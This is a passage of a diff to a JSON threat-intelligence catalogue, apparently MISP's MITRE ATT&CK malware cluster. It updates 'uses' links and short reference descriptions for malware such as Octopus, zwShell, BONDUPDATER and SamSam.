], "type": "uses" }, + { + "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "46944654-fcc1-4f63-9dad-628102376586", "tags": [ @@ -7534,14 +8954,14 @@ "type": "uses" }, { - "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -7575,13 +8995,6 @@ ], "type": "uses" }, - { - "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ @@ -7597,7 +9010,7 @@ "type": "uses" }, { - "dest-uuid": "6e6845c2-347a-4a6f-a2d1-b74a18ebd352", + "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -7611,14 +9024,21 @@ "type": "uses" }, { - "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e", + "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5", + "dest-uuid": "6e6845c2-347a-4a6f-a2d1-b74a18ebd352", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -7689,14 +9109,14 @@ "type": "uses" }, { - "dest-uuid": "f981d199-2720-467e-9dc9-eea04dbe05cf", + "dest-uuid": "351c0927-2fc1-4a2c-ad84-cbbee7eb8172", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "351c0927-2fc1-4a2c-ad84-cbbee7eb8172", + "dest-uuid": "f981d199-2720-467e-9dc9-eea04dbe05cf", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -7868,14 +9288,7 @@ "type": "uses" }, { - "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "f72eb8a8-cd4c-461d-a814-3f862befbf00", + "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -7889,14 +9302,21 @@ "type": "uses" }, { - "dest-uuid": "c21d5a77-d422-4a69-acd7-2c53c1faa34b", + "dest-uuid": "4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", + "dest-uuid": "92d7da27-2d91-488e-a00c-059dc162766d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "c21d5a77-d422-4a69-acd7-2c53c1faa34b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -7917,14 +9337,14 @@ "type": "uses" }, { - "dest-uuid": "4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5", + "dest-uuid": "f72eb8a8-cd4c-461d-a814-3f862befbf00", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "92d7da27-2d91-488e-a00c-059dc162766d", + "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -7934,6 +9354,89 @@ "uuid": "53cf6cc4-65aa-445a-bcf8-c3d296f8a7a2", "value": "NETEAGLE - S0034" }, + { + "description": "[Octopus](https://attack.mitre.org/software/S0340) is a Windows Trojan.(Citation: Securelist Octopus Oct 2018)", + "meta": { + "external_id": "S0340", + "mitre_platforms": [ + "Windows" + ], + "refs": [ + "https://attack.mitre.org/software/S0340", + "https://securelist.com/octopus-infested-seas-of-central-asia/88200/" + ], + "synonyms": [ + "Octopus" + ] + }, + "related": [ + { + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "cc7b8c4e-9be0-47ca-b0bb-83915ec3ee2f", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + } + ], + "uuid": "e2031fd5-02c2-43d4-85e2-b64f474530c2", + "value": "Octopus - S0340" + }, { "description": "[SPACESHIP](https://attack.mitre.org/software/S0035) is malware developed by [APT30](https://attack.mitre.org/groups/G0013) that allows propagation and exfiltration of data over removable devices. [APT30](https://attack.mitre.org/groups/G0013) may use this capability to exfiltrate data across air-gaps. (Citation: FireEye APT30)", "meta": { @@ -7965,14 +9468,14 @@ "type": "uses" }, { - "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", + "dest-uuid": "7dd95ff6-712e-4056-9626-312ea4ab4c5e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "7dd95ff6-712e-4056-9626-312ea4ab4c5e", + "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -8029,21 +9532,7 @@ "type": "uses" }, { - "dest-uuid": "e906ae4d-1d3a-4675-be23-22f7311c0da4", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "dest-uuid": "b9f5dbe2-4c55-4fc5-af2e-d42c1d182ec4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -8056,6 +9545,13 @@ ], "type": "uses" }, + { + "dest-uuid": "a257ed11-ff3b-4216-8c9d-3938ef57064c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "970cdb5c-02fb-4c38-b17e-d6327cf3c810", "tags": [ @@ -8064,7 +9560,49 @@ "type": "uses" }, { - "dest-uuid": "b9f5dbe2-4c55-4fc5-af2e-d42c1d182ec4", + "dest-uuid": "4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "6ff403bc-93e3-48be-8687-e102fdba8c88", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e906ae4d-1d3a-4675-be23-22f7311c0da4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "cc7b8c4e-9be0-47ca-b0bb-83915ec3ee2f", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -8085,28 +9623,97 @@ "type": "uses" }, { - "dest-uuid": "cc7b8c4e-9be0-47ca-b0bb-83915ec3ee2f", + "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "a257ed11-ff3b-4216-8c9d-3938ef57064c", + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + } + ], + "uuid": "67e6d66b-1b82-4699-b47a-e2efb6268d14", + "value": "SeaDuke - S0053" + }, + { + "description": "[zwShell](https://attack.mitre.org/software/S0350) is a remote access tool (RAT) written in Delphi that has been used by [Night Dragon](https://attack.mitre.org/groups/G0014).(Citation: McAfee Night Dragon)", + "meta": { + "external_id": "S0350", + "mitre_platforms": [ + "Windows" + ], + "refs": [ + "https://attack.mitre.org/software/S0350", + "https://securingtomorrow.mcafee.com/wp-content/uploads/2011/02/McAfee_NightDragon_wp_draft_to_customersv1-1.pdf" + ], + "synonyms": [ + "zwShell" + ] + }, + "related": [ + { + "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", + "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5", + "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "51dea151-0898-4a45-967c-3ebee0420484", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "ffe742ed-9100-4686-9e00-c331da544787", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -8120,7 +9727,49 @@ "type": "uses" }, { - "dest-uuid": "6ff403bc-93e3-48be-8687-e102fdba8c88", + "dest-uuid": "478aa214-2ca7-4ec0-9978-18798e514790", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + } + ], + "uuid": "54e8672d-5338-4ad1-954a-a7c986bee530", + "value": "zwShell - S0350" + }, + { + "description": "[BONDUPDATER](https://attack.mitre.org/software/S0360) is a PowerShell backdoor used by [OilRig](https://attack.mitre.org/groups/G0049). It was first observed in November 2017 during targeting of a Middle Eastern government organization, and an updated version was observed in August 2018 being used to target a government organization with spearphishing emails.(Citation: FireEye APT34 Dec 2017)(Citation: Palo Alto OilRig Sep 2018)", + "meta": { + "external_id": "S0360", + "mitre_platforms": [ + "Windows" + ], + "refs": [ + "https://attack.mitre.org/software/S0360", + "https://www.fireeye.com/blog/threat-research/2017/12/targeted-attack-in-middle-east-by-apt34.html", + "https://unit42.paloaltonetworks.com/unit42-oilrig-uses-updated-bondupdater-target-middle-eastern-government/" + ], + "synonyms": [ + "BONDUPDATER" + ] + }, + "related": [ + { + "dest-uuid": "54456690-84de-4538-9101-643e26437e09", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -8132,10 +9781,24 @@ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "f4882e23-8aa7-4b12-b28a-b349c12ee9e0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], - "uuid": "67e6d66b-1b82-4699-b47a-e2efb6268d14", - "value": "SeaDuke - S0053" + "uuid": "d5268dfb-ae2b-4e0e-ac07-02a460613d8a", + "value": "BONDUPDATER - S0360" }, { "description": "[FLASHFLOOD](https://attack.mitre.org/software/S0036) is malware developed by [APT30](https://attack.mitre.org/groups/G0013) that allows propagation and exfiltration of data over removable devices. [APT30](https://attack.mitre.org/groups/G0013) may use this capability to exfiltrate data across air-gaps. (Citation: FireEye APT30)", @@ -8160,6 +9823,13 @@ ], "type": "uses" }, + { + "dest-uuid": "7dd95ff6-712e-4056-9626-312ea4ab4c5e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "1b7ba276-eedc-4951-a762-0ceea2c030ec", "tags": [ @@ -8174,13 +9844,6 @@ ], "type": "uses" }, - { - "dest-uuid": "7dd95ff6-712e-4056-9626-312ea4ab4c5e", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", "tags": [ @@ -8232,6 +9895,13 @@ ], "type": "uses" }, + { + "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "e358d692-23c0-4a31-9eb6-ecc13a8d7735", "tags": [ @@ -8239,20 +9909,6 @@ ], "type": "uses" }, - { - "dest-uuid": "7e150503-88e7-4861-866b-ff1ac82c4475", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "72b74d71-8169-42aa-92e0-e7b04b9f5a08", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", "tags": [ @@ -8261,7 +9917,14 @@ "type": "uses" }, { - "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", + "dest-uuid": "72b74d71-8169-42aa-92e0-e7b04b9f5a08", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7e150503-88e7-4861-866b-ff1ac82c4475", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -8297,20 +9960,6 @@ ], "type": "uses" }, - { - "dest-uuid": "ad255bfe-a9e6-4b52-a258-8d3462abe842", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "f4882e23-8aa7-4b12-b28a-b349c12ee9e0", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "830c9528-df21-472c-8c14-a036bf17d665", "tags": [ @@ -8318,6 +9967,13 @@ ], "type": "uses" }, + { + "dest-uuid": "ad255bfe-a9e6-4b52-a258-8d3462abe842", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "a19e86f8-1c0a-4fea-8407-23b73d615776", "tags": [ @@ -8331,6 +9987,13 @@ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "f4882e23-8aa7-4b12-b28a-b349c12ee9e0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "2daa14d6-cbf3-4308-bb8e-213c324a08e4", @@ -8364,6 +10027,65 @@ "uuid": "56f46b17-8cfa-46c0-b501-dd52fef394e2", "value": "ASPXSpy - S0073" }, + { + "description": "[SamSam](https://attack.mitre.org/software/S0370) is ransomware that appeared in early 2016. Unlike some ransomware, its variants have required operators to manually interact with the malware to execute some of its core components.(Citation: US-CERT SamSam 2018)(Citation: Talos SamSam Jan 2018)(Citation: Sophos SamSam Apr 2018)(Citation: Symantec SamSam Oct 2018)", + "meta": { + "external_id": "S0370", + "mitre_platforms": [ + "Windows" + ], + "refs": [ + "https://attack.mitre.org/software/S0370", + "https://www.us-cert.gov/ncas/alerts/AA18-337A", + "https://blog.talosintelligence.com/2018/01/samsam-evolution-continues-netting-over.html", + "https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/SamSam-ransomware-chooses-Its-targets-carefully-wpna.pdf", + "https://www.symantec.com/blogs/threat-intelligence/samsam-targeted-ransomware-attacks" + ], + "synonyms": [ + "SamSam", + "Samas" + ] + }, + "related": [ + { + "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "519630c5-f03f-4882-825c-3af924935817", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b80d107d-fa0d-4b60-9684-b0433e8bdba0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + } + ], + "uuid": "4d56e6e9-1a6d-46e3-896c-dfdf3cc96e62", + "value": "SamSam - S0370" + }, { "description": "[Duqu](https://attack.mitre.org/software/S0038) is a malware platform that uses a modular approach to extend functionality after deployment within a target network. (Citation: Symantec W32.Duqu)", "meta": { @@ -8394,34 +10116,6 @@ ], "type": "uses" }, - { - "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "ad255bfe-a9e6-4b52-a258-8d3462abe842", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "b9f5dbe2-4c55-4fc5-af2e-d42c1d182ec4", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "4ae4f953-fe58-4cc8-a327-33257e30a830", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "dcaa092b-7de9-4a21-977f-7fcb77e89c48", "tags": [ @@ -8430,21 +10124,7 @@ "type": "uses" }, { - "dest-uuid": "4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "72b74d71-8169-42aa-92e0-e7b04b9f5a08", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", + "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -8458,7 +10138,28 @@ "type": "uses" }, { - "dest-uuid": "731f4f55-b6d0-41d1-a7a9-072a66389aea", + "dest-uuid": "f72eb8a8-cd4c-461d-a814-3f862befbf00", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "4ae4f953-fe58-4cc8-a327-33257e30a830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "72b74d71-8169-42aa-92e0-e7b04b9f5a08", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b9f5dbe2-4c55-4fc5-af2e-d42c1d182ec4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -8471,6 +10172,27 @@ ], "type": "uses" }, + { + "dest-uuid": "478aa214-2ca7-4ec0-9978-18798e514790", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "ad255bfe-a9e6-4b52-a258-8d3462abe842", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "ffe742ed-9100-4686-9e00-c331da544787", "tags": [ @@ -8492,34 +10214,6 @@ ], "type": "uses" }, - { - "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "478aa214-2ca7-4ec0-9978-18798e514790", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "f72eb8a8-cd4c-461d-a814-3f862befbf00", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "d54416bd-0803-41ca-870a-ce1af7c05638", "tags": [ @@ -8527,6 +10221,27 @@ ], "type": "uses" }, + { + "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "731f4f55-b6d0-41d1-a7a9-072a66389aea", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", "tags": [ @@ -8535,7 +10250,21 @@ "type": "uses" }, { - "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9", + "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -8575,48 +10304,6 @@ ], "type": "uses" }, - { - "dest-uuid": "799ace7f-e227-4411-baa0-8868704f2a69", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "128c55d3-aeba-469f-bd3e-c8996ab4112a", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "f72eb8a8-cd4c-461d-a814-3f862befbf00", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "c21d5a77-d422-4a69-acd7-2c53c1faa34b", "tags": [ @@ -8632,7 +10319,35 @@ "type": "uses" }, { - "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", + "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "799ace7f-e227-4411-baa0-8868704f2a69", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f72eb8a8-cd4c-461d-a814-3f862befbf00", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "128c55d3-aeba-469f-bd3e-c8996ab4112a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -8645,12 +10360,26 @@ ], "type": "uses" }, + { + "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "0db09158-6e48-4e7c-8ce7-2b10b9c0c039", @@ -8680,13 +10409,6 @@ ], "type": "uses" }, - { - "dest-uuid": "0d95940f-9583-4e0f-824c-a42c1be47fad", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "e8b4e1ec-8e3b-484c-9038-4459b1ed8060", "tags": [ @@ -8707,6 +10429,13 @@ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "0d95940f-9583-4e0f-824c-a42c1be47fad", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "f6ac21b6-2592-400c-8472-10d0e2f1bfaf", @@ -8725,10 +10454,13 @@ "https://labsblog.f-secure.com/2015/09/08/sofacy-recycles-carberp-and-metasploit-code/", "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part1.pdf", "https://www2.fireeye.com/rs/848-DID-242/images/APT28-Center-of-Storm-2017.pdf", + "https://www.symantec.com/blogs/election-security/apt28-espionage-military-government", + "https://blog.talosintelligence.com/2017/10/cyber-conflict-decoy-document.html", "https://researchcenter.paloaltonetworks.com/2018/02/unit42-sofacy-attacks-multiple-government-entities/" ], "synonyms": [ "JHUHUGIT", + "Trojan.Sofacy", "Seduploader", "JKEYSKW", "Sednit", @@ -8779,6 +10511,13 @@ ], "type": "uses" }, + { + "dest-uuid": "9b52fca7-1a36-4da0-b62d-da5bd83b4d69", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", "tags": [ @@ -8786,27 +10525,6 @@ ], "type": "uses" }, - { - "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "30973a08-aed9-4edf-8604-9084ce1b5c4f", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", "tags": [ @@ -8815,42 +10533,7 @@ 